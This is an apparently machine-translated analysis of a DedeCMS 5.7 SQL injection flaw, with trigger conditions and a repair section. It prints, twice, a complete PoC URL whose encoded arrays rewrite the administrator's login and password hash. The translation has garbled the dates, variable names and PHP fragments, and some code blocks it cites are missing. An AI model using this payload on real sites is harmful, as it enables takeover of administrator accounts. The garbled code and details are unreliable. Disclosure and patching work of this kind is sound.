Dedecms latest injection vulnerability analysis and repair

Recently, I sawExploitation of an injection vulnerability in the latest dedecms versionThe vulnerability PoC and analysis articles are also published on the Internet. However, during my actual testing, I found that the vulnerability cannot be reproduced. The reason is that the exploitation of this vulnerability requires certain prerequisites, which are not described in the original analysis article. Therefore, I will summarize my analysis process and some necessary conditions for triggering.

I. Vulnerability tracking

Released on: July 15, June 7, 2013

Vulnerability description:

DedeCMS is a website application system building platform and a powerful website content management system. Based on the PHP + MySQL technical architecture, fully open-source and powerful and stable technical architecture, can be used to build a complex system of enterprise information portals or e-commerce website platforms, it can also be used to manage simple content publishing websites. Whether it is a business resource portal or an entertainment information portal, it is a good helper for you to manage websites.

The root cause of vulnerability triggering is dedesql. class. php does not initialize the two global variables $ GLOBALS ['arrs1'] and $ GLOBALS ['arrs1'], which overwrites any global variables.

Hazards:Because dedecms is widely used, this vulnerability is easy to use and highly harmful. It can remotely obtain the management background and then directly obtain system control using getshell.

Trigger condition:Make sure php_mysql.dll is not enabled in php. ini,

:

Affected Versions:Dedecms 5.7

Ii. Vulnerability principles

First, let's talk about the dedecms unsafe parameter processing mechanism. Here we will take a look at line 79th of the/include/common. inc. php code:

Foreach (Array ('_ get',' _ Post', '_ COOKIE') as $ _ request)

{

Foreach ($ _ request as $ _ k => $ _ v)

{

If ($ _ k = 'varname') $ {$ _ k} = $ _ v;

Else$ {$ _ K} = _ RunMagicQuotes ($ _ v );

}

}

The root cause of all evil is actually here. Basically, all the vulnerabilities discovered by dede are here. We can see that after the program extracts the name-value pair from the GPC array, it just performs simple addslashes processing on $ _ v and then directly assigns it to $ {$ _ k }, A mechanism similar to global variable coverage is implemented. The original intention is to facilitate development, but there are serious security problems. After so many years of upgrading, PHP has finally fixed the register_globals problem, but the dede code makes php's efforts in vain.

Next we will return to the vulnerability.

First, line 589-600 of/include/dedesql. class. php,

Before executing this code, the program did not initialize the arrays $ arrs1 and $ arrs2. Combined with the insecure dede parameter processing mechanism, we can use this code to overwrite any global variables. For example, in this vulnerability, we can control the value of $ GLOBALS ['cfg _ dbprefix.

Then, let's take a look at how to use $ GLOBALS ['cfg _ dbprefix'].

Here, in the SetQuery function of line 3 of/include/dedesql. class. php, the Code is as follows:

Here, because $ GLOBALS ['cfg _ dbprefix'] is controllable, and $ prefix is also controllable, SQL injection is caused here.

The following describes how the entire vulnerability is triggered. This is a public PoC on the Internet:

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1 [] = 99 & arrs1 [] = 102 & arrs1 [] = 103 & arrs1 [] = 95 & arrs1 [] = 100 & arrs1 [] = 98 & arrs1 [] = 112 & arrs1 [] = 114 & arrs1 [] = 101 & arrs1 [] = 102 & arrs1 [] = 105 & arrs1 [] = 120 & arrs2 [] = 97 & arrs2 [] = 100 & arrs2 [] = 109 & arrs2 [] = 105 & arrs2 [] = 110 & arrs2 [] = 96 & arrs2 [] = 32 & arrs2 [] = 83 & arrs2 [] = 69 & arrs2 [] = 84 & arrs2 [] = 32 & arrs2 [] = 96 & arrs2 [] = 117 & arrs2 [] = 115 & arrs2 [] = 101 & arrs2 [] = 114 & arrs2 [] = 105 & arrs2 [] = 100 & arrs2 [] = 96 & arrs2 [] = 61 & arrs2 [] = 39 & arrs2 [] = 116 & arrs2 [] = 101 & arrs2 [] = 115 & arrs2 [] = 116 & arrs2 [] = 39 & arrs2 [] = 44 & arrs2 [] = 32 & arrs2 [] = 96 & arrs2 [] = 112 & arrs2 [] = 119 & arrs2 [] = 100 & arrs2 [] = 96 & arrs2 [] = 61 & arrs2 [] = 39 & arrs2 [] = 102 & arrs2 [] = 50 & arrs2 [] = 57 & arrs2 [] = 55 & arrs2 [] = 97 & arrs2 [] = 53 & arrs2 [] = 55 & arrs2 [] = 97 & arrs2 [] = 53 & arrs2 [] = 97 & arrs2 [] = 55 & arrs2 [] = 52 & arrs2 [] = 51 & arrs2 [] = 56 & arrs2 [] = 57 & arrs2 [] = 52 & arrs2 [] = 97 & arrs2 [] = 48 & arrs2 [] = 101 & arrs2 [] = 52 & arrs2 [] = 39 & arrs2 [] = 32 & arrs2 [] = 119 & arrs2 [] = 104 & arrs2 [] = 101 & arrs2 [] = 114 & arrs2 [] = 101 & arrs2 [] = 32 & arrs2 [] = 105 & arrs2 [] = 100 & arrs2 [] = 61 & arrs2 [] = 49 & arrs2 [] = 32 & arrs2 [] = 35

First, let's take a look at this if judgment, which means that if mysqli extension is enabled, dedesqli. class. php is included. The vulnerability code is in dedesql. class. php. Therefore, you must disable the mysqli extension to exploit the vulnerability.

Dedesql. class. php code is entered here,

Here, the input arrs1 and arrs2 arrays have not been initialized, so $ v1 and $ v2 are concatenated as strings,

So here $ GLOBALS ['cfg _ dbprefix'] is overwritten

Admin 'set 'userid' = 'test', 'pwd' = 'f297a57a5a743894a0e4 'where id = 1 #

Continue tracing code execution,

Follow the ExecuteNoneQuery2 function and follow up with SetQuery,

Here, because $ GLOBALS ['cfg _ dbprefix'] is controllable, it causes injection. Here, let's take a look at the value of $ SQL,

Because the ExecuteNoneQuery2 function does not use mysql-ids for filtering, it is used for injection. After successful update, the background account is test and the password is admin.

Iii. Vulnerability Verification

PoC:

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1 [] = 99 & arrs1 [] = 102 & arrs1 [] = 103 & arrs1 [] = 95 & arrs1 [] = 100 & arrs1 [] = 98 & arrs1 [] = 112 & arrs1 [] = 114 & arrs1 [] = 101 & arrs1 [] = 102 & arrs1 [] = 105 & arrs1 [] = 120 & arrs2 [] = 97 & arrs2 [] = 100 & arrs2 [] = 109 & arrs2 [] = 105 & arrs2 [] = 110 & arrs2 [] = 96 & arrs2 [] = 32 & arrs2 [] = 83 & arrs2 [] = 69 & arrs2 [] = 84 & arrs2 [] = 32 & arrs2 [] = 96 & arrs2 [] = 117 & arrs2 [] = 115 & arrs2 [] = 101 & arrs2 [] = 114 & arrs2 [] = 105 & arrs2 [] = 100 & arrs2 [] = 96 & arrs2 [] = 61 & arrs2 [] = 39 & arrs2 [] = 116 & arrs2 [] = 101 & arrs2 [] = 115 & arrs2 [] = 116 & arrs2 [] = 39 & arrs2 [] = 44 & arrs2 [] = 32 & arrs2 [] = 96 & arrs2 [] = 112 & arrs2 [] = 119 & arrs2 [] = 100 & arrs2 [] = 96 & arrs2 [] = 61 & arrs2 [] = 39 & arrs2 [] = 102 & arrs2 [] = 50 & arrs2 [] = 57 & arrs2 [] = 55 & arrs2 [] = 97 & arrs2 [] = 53 & arrs2 [] = 55 & arrs2 [] = 97 & arrs2 [] = 53 & arrs2 [] = 97 & arrs2 [] = 55 & arrs2 [] = 52 & arrs2 [] = 51 & arrs2 [] = 56 & arrs2 [] = 57 & arrs2 [] = 52 & arrs2 [] = 97 & arrs2 [] = 48 & arrs2 [] = 101 & arrs2 [] = 52 & arrs2 [] = 39 & arrs2 [] = 32 & arrs2 [] = 119 & arrs2 [] = 104 & arrs2 [] = 101 & arrs2 [] = 114 & arrs2 [] = 101 & arrs2 [] = 32 & arrs2 [] = 105 & arrs2 [] = 100 & arrs2 [] = 61 & arrs2 [] = 49 & arrs2 [] = 32 & arrs2 [] = 35

Verification:

Iv. Vulnerability repair

Modify php. ini to enable php_mysqli.dll extension.

0 × 02. modify the code in/include/dedesql. class. php as follows:

Require_once (DEDEINC. '/common. func. php ');

// Introduce the Database Class

If ($ GLOBALS ['cfg _ mysql_type '] = 'mysqli' & function_exists ("mysqli_init "))

{

// Echo $ GLOBALS ['cfg _ mysql_type '];

// Exit;

Require_once (DEDEINC. '/dedesqli. class. php ');

} Else {

Require_once (DEDEINC. '/dedesql. class. php ');

}

// Require_once (DEDEINC. '/common. func. php ');